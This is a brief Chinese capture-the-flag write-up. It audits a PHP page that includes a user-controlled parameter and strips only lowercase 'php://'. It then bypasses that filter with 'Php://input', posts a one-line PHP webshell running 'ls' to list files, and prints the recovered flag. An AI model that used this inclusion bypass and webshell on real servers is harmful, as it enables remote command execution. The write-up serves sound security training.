解:打开靶机显示一段php代码,进行代码审计
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
strstr() 函数搜索字符串在另一字符串中的第一次出现。
注释:该函数对大小写敏感。如需进行不区分大小写的搜索,请使用 stristr() 函数。
str_replace() 函数替换字符串中的一些字符(区分大小写)。
所以咱们可以用大写来绕过php://进行一句话木马查看文件,用bp抓个包,加入画红线的部分,读取目录
/?page=Php://input
<?php system("ls")?>
发现有个fl4gisisish3r3.php文件,cat一下就有答案了
ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}